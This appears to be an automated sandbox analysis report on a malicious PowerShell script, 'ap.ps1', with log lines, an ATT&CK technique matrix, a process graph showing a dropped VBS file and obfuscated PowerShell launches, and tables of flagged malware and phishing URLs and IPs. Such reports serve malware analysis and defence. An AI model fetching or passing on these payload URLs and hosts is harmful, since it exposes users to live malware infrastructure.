          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (9 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | Valid Accounts | 12 Command and Scripting Interpreter | 111 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1568999
Sample: ap.ps1
Startdate: 05/12/2024
Architecture: WINDOWS
Score: 100

Start (node 2):
  DNS/IP: www.fornid.com; fornid.com; 5 other IPs or domains
  Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
  Started: powershell.exe (node 9) 16 23

powershell.exe (node 9):
  DNS/IP: fornid.com 93.95.216.175, 443, 49728 SERVERPLAN-ASIT Italy; www.pineappletech.ae 91.193.42.13, 443, 49741 ITFPL Belgium
  Dropped file: C:\Users\Public\sz3.vbs, ASCII
  Signatures: Powershell creates an autostart link
  Started: wscript.exe (node 14) 1; powershell.exe (node 17) 23; conhost.exe (node 19)

wscript.exe (node 14):
  Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 2 other signatures
  Started: powershell.exe (node 21) 35

powershell.exe (node 17):
  Signatures: Loading BitLocker PowerShell Module

powershell.exe (node 21):
  DNS/IP: erp-royal-crown.info 148.251.114.233, 443, 49784, 49813 HETZNER-ASDE Germany; almrwad.com 184.171.244.231, 443, 49754, 49770 DIMENOCUS United States
  Started: conhost.exe (node 24); cmd.exe (node 26) 1

Source | Detection | Scanner | Label
ap.ps1 | 29% | ReversingLabs | Script-PowerShell.Trojan.PShell
ap.ps1 | 100% | Avira | TR/PShell.Dldr.VPA
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
https://www.almrwad.com/w | 0% | Avira URL Cloud | safe
https://www.fornid.com/ordine | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordine | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordiner | 0% | Avira URL Cloud | safe
https://www.fornid.com/wh/List | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subordinerende | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Subordinerend | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Subordineren | 100% | Avira URL Cloud | phishing
https://www.almrwad.com/ | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Su | 0% | Avira URL Cloud | safe
http://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
https://www.almrwad.c | 0% | Avira URL Cloud | safe
https://www.pineappletech.ae/na/mg.vbs | 100% | Avira URL Cloud | malware
https://www.fornid.com/90-maschere-per-saldatura | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subordine | 100% | Avira URL Cloud | phishing
http://www.pineappletech.ae | 0% | Avira URL Cloud | safe
https://www.fornid.com/133-occhiali-protettivi | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.i | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
https://www.almrwad.com/wh/Subordin | 0% | Avira URL Cloud | safe
https://www.fornid.com/themes/PRS070158/css/megnor/custom.css | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/ | 100% | Avira URL Cloud | phishing
https://www.fornid.com/contattaci | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subord | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinerendes | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/ | 0% | Avira URL Cloud | safe
https://go.micro | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinerendes7 | 0% | Avira URL Cloud | safe
https://www.almrwad.com | 0% | Avira URL Cloud | safe
https://www.fornid.com | 0% | Avira URL Cloud | safe
https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | 100% | Avira URL Cloud | malware
https://www.almrwad.com/wh/Subordinerendes78.s | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinerende | 0% | Avira URL Cloud | safe
http://www.fornid.com/ | 0% | Avira URL Cloud | safe
https://www.fornid.com/144-filtri-per-maschere | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinerendes78.sm | 0% | Avira URL Cloud | safe
https://www.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdf | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinerendes78 | 0% | Avira URL Cloud | safe
http://almrwad.com | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subord | 100% | Avira URL Cloud | phishing
https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3 | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/w | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | phishing
https://www.almrwad.com/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | malware
https://www.erp-royal-crown. | 0% | Avira URL Cloud | safe
http://fornid.com | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh | 100% | Avira URL Cloud | phishing
https://www.fornid.com/sitemap | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subordinere | 100% | Avira URL Cloud | phishing
https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro | 0% | Avira URL Cloud | safe
https://www.fornid.com/145-maschere-antigas | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinerend | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subor | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Subordi | 100% | Avira URL Cloud | phishing
https://www.fornid.com/il-mio-account | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subo | 100% | Avira URL Cloud | phishing
http://www.almrwad.com | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.in | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinere | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordi | 0% | Avira URL Cloud | safe
https://www.almrwad.co | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordinerendes78. | 0% | Avira URL Cloud | safe
http://erp-royal-crown.info | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Subordinerendes | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Subordinerendes78.s | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Subordin | 100% | Avira URL Cloud | phishing
https://www.fornid.com/img/logo.jpg | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subo | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Sub | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh | 0% | Avira URL Cloud | safe
http://blog.fornid.com/ | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subordinerendes78 | 100% | Avira URL Cloud | phishing
http://www.fornid.com/content/13-international-shipments | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subor | 0% | Avira URL Cloud | safe
https://www.almrwad. | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Subordinerendes7 | 100% | Avira URL Cloud | phishing
https://www.pinualapplualtualch.aual/na/mg.vbs | 0% | Avira URL Cloud | safe
http://www.fornid.com | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/ | 100% | Avira URL Cloud | phishing
https://www.fornid.com/cerca | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Subordineren | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.inf | 0% | Avira URL Cloud | safe
http://crl.m | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
erp-royal-crown.info | 148.251.114.233 | true | false | (none) | unknown
almrwad.com | 184.171.244.231 | true | false | (none) | unknown
fornid.com | 93.95.216.175 | true | true | (none) | unknown
www.pineappletech.ae | 91.193.42.13 | true | false | (none) | unknown
www.fornid.com | unknown | unknown | true | (none) | unknown
www.almrwad.com | unknown | unknown | false | (none) | unknown
www.erp-royal-crown.info | unknown | unknown | false | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.pineappletech.ae/na/mg.vbs | true | Avira URL Cloud: malware | unknown
https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | true | Avira URL Cloud: malware | unknown
https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | true | Avira URL Cloud: phishing | unknown
https://www.almrwad.com/wh/Subordinerendes78.smi | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.almrwad.com/w | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/ordine | powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordine | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Subordiner | powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/wh/List | powershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 00000002.00000002.1606334423.000002CD5FBA0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
